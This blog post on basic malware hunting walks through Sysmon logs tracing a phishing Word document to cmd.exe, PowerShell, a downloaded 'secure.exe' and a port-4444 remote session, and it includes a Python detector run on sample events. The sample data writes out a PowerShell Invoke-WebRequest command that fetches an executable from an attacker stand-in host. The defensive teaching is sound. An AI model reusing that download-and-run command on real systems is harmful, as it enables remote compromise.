Detecting a Cyber Attack Part 4 (Sysmon – Basic malware hunting 2)

In our first malware hunting blog we looked at an incident where a user had downloaded a malicious application from a website. Here we are going to investigate a malicious document which was received via email. This is our second basic investigation, but we will continue to ramp things up over the coming months.

Modern antivirus, despite being very good at identifying and blocking known threats, can still be bypassed by unknown exploits (zero days) and malicious MS Office document macros. Like any other software, it can also suffer faults that stop it working correctly, which is why you need an effective logging solution that lets an investigation identify the instances where malware has circumvented the protection in place.

This blog uses techniques we taught during our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt, you can use the same malicious exe and website from that exercise. The first blog is here: https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/

In our scenario an end user has been duped into opening a malicious document. We have received some unusual traffic alerts on the firewall from this asset, so we connect to take a look. Let’s jump in.

Although we don’t know it yet, the user received the below document

which, when opened, ran a malicious script that opened a remote connection back to the attacker, giving them full access to the asset. This process is shown in the series of images below.

Once the victim has clicked yes in the document, the attacker sees the connection in their terminal.

The malicious process is running as PID 4048.

We obviously do not have this information yet, but luckily we have Sysmon configured as covered in the previous blogs, so let’s see what we can find.

We know the user works in Finance, we know when we first saw alerts on the firewall, and we also know that the number one attack vector for end users is phishing emails. Speak to the user: do they remember opening an attachment which crashed, receiving any unusual emails, or seeing pop-ups when browsing the internet? Any information the user can provide could be important.

We decide to start by looking for unusual activity relating to Office programs. Obviously we could just run netstat and look for unusual connections, but we are concentrating on Sysmon here.

We find a Word doc being opened by WINWORD.EXE, but nothing odd yet.

However, this next log looks suspicious: we have what appears to be WINWORD.EXE (ParentImage) launching cmd.exe (Image), and the parent command line seems to be the Word doc we saw earlier.

Now we have cmd.exe launching PowerShell, which then runs an “Invoke-WebRequest” command line, used to download files. Here it creates a file named “secure.exe”.

We now have PowerShell launching another PowerShell instance, which instructs the session to wait for 10 seconds.

Next we see PowerShell making an outbound connection to the same website mentioned in the above logs.

And finally, here we see confirmation of the malicious remote session connecting to “legitimate.website.com” on port 4444, with the Process ID of 4048.

If we refer back to Task Manager we can see that this matches the malicious exe.
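The chain we just followed by hand (Office parent, shell child, PowerShell download, outbound connection from the dropped exe) can be pulled out of Sysmon events automatically. The Python below is an added example, not code from the original post: it uses Sysmon's field names (ProcessId, ParentImage, DestinationPort and so on), but every event record in it is constructed sample data, including the file paths, PIDs other than 4048 and the download URL.

```python
# Added example, not code from the original post: correlate constructed Sysmon
# Event ID 1 (ProcessCreate) and Event ID 3 (NetworkConnect) records to surface the
# chain hunted above. Field names follow Sysmon; all values are constructed sample data.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}

def pc(pid, image, ppid, pimage, cmd):  # build an Event ID 1 (ProcessCreate) record
    return {"EventID": 1, "ProcessId": pid, "Image": image, "ParentProcessId": ppid,
            "ParentImage": pimage, "CommandLine": cmd}
def nc(pid, image, host, port):  # build an Event ID 3 (NetworkConnect) record
    return {"EventID": 3, "ProcessId": pid, "Image": image, "DestinationHostname": host, "DestinationPort": port}
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CMD, PS = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed, in the order the post walks through them
    pc(3100, WORD, 900, r"C:\Windows\explorer.exe", r'"WINWORD.EXE" "C:\Users\fin\Downloads\invoice.docx"'),
    pc(3320, CMD, 3100, WORD, "cmd.exe /c powershell.exe"),
    pc(3400, PS, 3320, CMD, "powershell Invoke-WebRequest http://legitimate.website.com/secure.exe -OutFile secure.exe"),
    pc(3500, PS, 3400, PS, "powershell Start-Sleep 10"),
    pc(4048, r"C:\Users\fin\secure.exe", 3400, PS, "secure.exe"),
    nc(4048, r"C:\Users\fin\secure.exe", "legitimate.website.com", 4444),
    nc(2000, r"C:\Windows\System32\svchost.exe", "update.example.com", 443),  # benign noise
]
def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def office_spawned_shells(events):
    """ProcessIds of shells whose parent is an Office app (the WINWORD.EXE -> cmd.exe log)."""
    return [e["ProcessId"] for e in events if e["EventID"] == 1
            and basename(e["ParentImage"]) in OFFICE and basename(e["Image"]) in SHELLS]

def descendants(events, root_pid):
    """root_pid plus everything spawned beneath it via ParentProcessId. Real hunts should key on ProcessGuid: PIDs get reused."""
    children = {}
    for e in events:
        if e["EventID"] == 1:
            children.setdefault(e["ParentProcessId"], []).append(e["ProcessId"])
    tree, stack = {root_pid}, [root_pid]
    while stack:
        for child in children.get(stack.pop(), []):
            if child not in tree:
                tree.add(child); stack.append(child)
    return tree

def suspicious_connections(events):
    """Event ID 3 records from any process in an Office -> shell tree (the port 4444 log above)."""
    hits = []
    for root in office_spawned_shells(events):
        tree = descendants(events, root)
        hits += [(e["ProcessId"], e["DestinationHostname"], e["DestinationPort"])
                 for e in events if e["EventID"] == 3 and e["ProcessId"] in tree]
    return hits
```

On the sample data this returns only the secure.exe session to legitimate.website.com:4444 and ignores the svchost.exe connection, because the tree is rooted at the shell that WINWORD.EXE spawned rather than at every outbound connection on the host.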

Again, this is a basic technique, but it will help you to understand the types of things you should be looking for. In future blogs we will go on to look at obfuscated commands and how we decode them to get the information we need.